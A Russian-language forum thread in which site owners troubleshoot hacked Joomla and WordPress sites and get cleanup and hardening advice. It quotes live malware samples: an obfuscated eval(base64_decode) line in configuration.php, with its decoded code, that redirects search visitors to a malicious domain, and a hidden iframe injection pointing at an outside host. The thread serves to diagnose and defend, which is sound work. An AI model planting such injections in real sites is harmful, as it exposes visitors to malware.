Важно Вирус на сайте

Больше
7 года 6 мес. назад - 7 года 6 мес. назад #1 от Aleksej
Вирус на сайте was created by Aleksej
Внимание, угроза!

Некоторое время назад один из сайтов перестал открываться... вернее, его открытие в Mozilla Firefox предваряла грозная надпись:

Занесен ли сайт xxxxxxx в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта несколько раз (1) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 2. Последний раз сайт просматривался Google 2010-10-22, а подозрительное содержание было обнаружено 2010-10-22.

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая freexxpote.co.cc/.

This site was hosted on 1 network(s) including AS12695 (DINET).


При ближайшем рассмотрении было обнаружено, что файл configuration.php модифицирован:
<?php
eval(base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg=="));

В качестве лечения:
$ php -r 'echo
base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg==");'

Но - что же это была за абракадабра такая?

Воспользовавшись сервисом Free online base64 encoder and decoder и введя часть кода, находящуюся между кавычек, получаем:
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
        if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){             
                header("Location: http://freexxpote.co.cc/");
                exit();
        }
        }
Last edit: 7 года 6 мес. назад by Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 2 мес. назад #2 от fluffy
Replied by fluffy on topic Вирус на сайте
Алексей, приветствую! Очень комфортный у тебя сайт, спасибо за работу!
Жалуюсь на проблему, собственно. Пытаюсь зайти на свой сайт, а НОД пишет, что прерывает соединение из -за угрозы HTML/Iframe.B.Gen вирус. Гугл не помог, что-то свеженькое, вероятно. Сайт этот .
Что делать несчастному чайнику? :(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 2 мес. назад - 6 года 2 мес. назад #3 от Aleksej
Replied by Aleksej on topic Вирус на сайте
Привет, пусть несчастный чайник попробует для начала iframe убрать или закомментить; он у тебя где-нить в индексном файле шаблона сидит:
<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe></body>
Last edit: 6 года 2 мес. назад by Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 2 мес. назад #4 от fluffy
Replied by fluffy on topic Вирус на сайте
Да Вы волшебник, Сэр! Таки оно...
УРРРЯЯЯ!!!! СПАСИБОООО!!!!!
А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 2 мес. назад - 6 года 2 мес. назад #5 от Aleksej
Replied by Aleksej on topic Вирус на сайте

fluffy пишет: А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?

В моей практике не было заражения сайта ифреймами, хвала всевышнему... но вот hubbitus говорит, что такое бывает, и нередко. Слушай, а ты уверен, что iframe не присутствовал в шаблоне сайта изначально? взгляни в старой резервной копии.

А вот что я видел неоднократно, так это заражение сайта злонамеренным программным кодом - виной чему ошибки админов, грамотно не расставивших файлам/каталогам необходимый и достаточный минимум permissions. В качестве несложного примера; если файлу configuration.php в корне сайта свойственно 0777 - то это спустя очень непродолжительное время гарантированное заражение сайта; если не ифреймом, так другой какой завернутой в base64_decode гадостью.

Спроси у поддержки хостинга, какие права на файлы/каталоги требует их апач, и взгляни, как там в реальности они у тебя расставлены. Всякое бывает. Можешь просто, зайдя по ssh, воспользоваться вот этим скриптом, дабы модифицировать разрешения:
find public_html -type d -exec chmod 0755 {} \;
find public_html -type f -exec chmod 0644 {} \;
Соответственно, 0755 и 0644 исправь на другие, если не подойдут. Или оставь так.

Вторая часто встречающаяся причина проблем с сайтами - виндовые файл-менеджеры, хранящие ftp-пароли в открытом виде. Плюс отсутствие хорошего антивируса на локальном рабочем компьютере. Здесь можно посоветовать перейти на использование токенов и сертификатов, отказавшись от паролей вообще..

Думаю, если учесть несложные, в общем, правила it-безопасности в работе с сайтом - всякие-разные "сторожа" без надобности. Конечно, gitignore или subversion неплохо бы освоить при случае.
Last edit: 6 года 2 мес. назад by Aleksej.
Спасибо сказали: fluffy

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #6 от Masha
Replied by Masha on topic Вирус на сайте
Помогите мне аааааа :( :( у меня на соей сайте о сериале Ходячих выходит Gen вирус :( у меня антивирус уже красный стал :( помоги мне его убрать аааааа :(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #7 от serge
Replied by serge on topic Вирус на сайте

Masha пишет: у меня на соей сайте о сериале Ходячих выходит Gen вирус у меня антивирус уже красный стал

Попробуйте вот эти скрипты . Все ведь давно для вас выложено.

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #8 от Masha
Replied by Masha on topic Вирус на сайте
а его искать в шаблоне?( index.php?(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #9 от serge
Replied by serge on topic Вирус на сайте
Существует немало способов помочь в вашей беде. Начните с самого простого - скачайте каталог вашего сайта на wp - себе на комп и тщательно просканируйте хорошим антивирусом с актуальной базой. Допустим, Касперским или ДокторомВебом. Удалите все, что антивирь посчитает нужным удалить, затем залейте каталог обратно и обновите движок wp через панель управления.

Либо у себя на локалке замените удаленные антивирусом файлы аналогами из распакованного архива движка wordpress(скачайте c оф. сайта).

Само собой разумеется, что перед тем, как что-либо делать - совершенно необходимо создать резеврную копию вашего сайта (дерево каталогов + база данных). Приступать к очистке, не имея под рукой актуального бэкапа - очень не рекомендуется.

Также вам в помощь бесплатные сервисы проверки сайтов на вирусы от компаний taghosting.ru и drweb.com.

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #10 от Masha
Replied by Masha on topic Вирус на сайте
как же тяжело :ohmy:

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.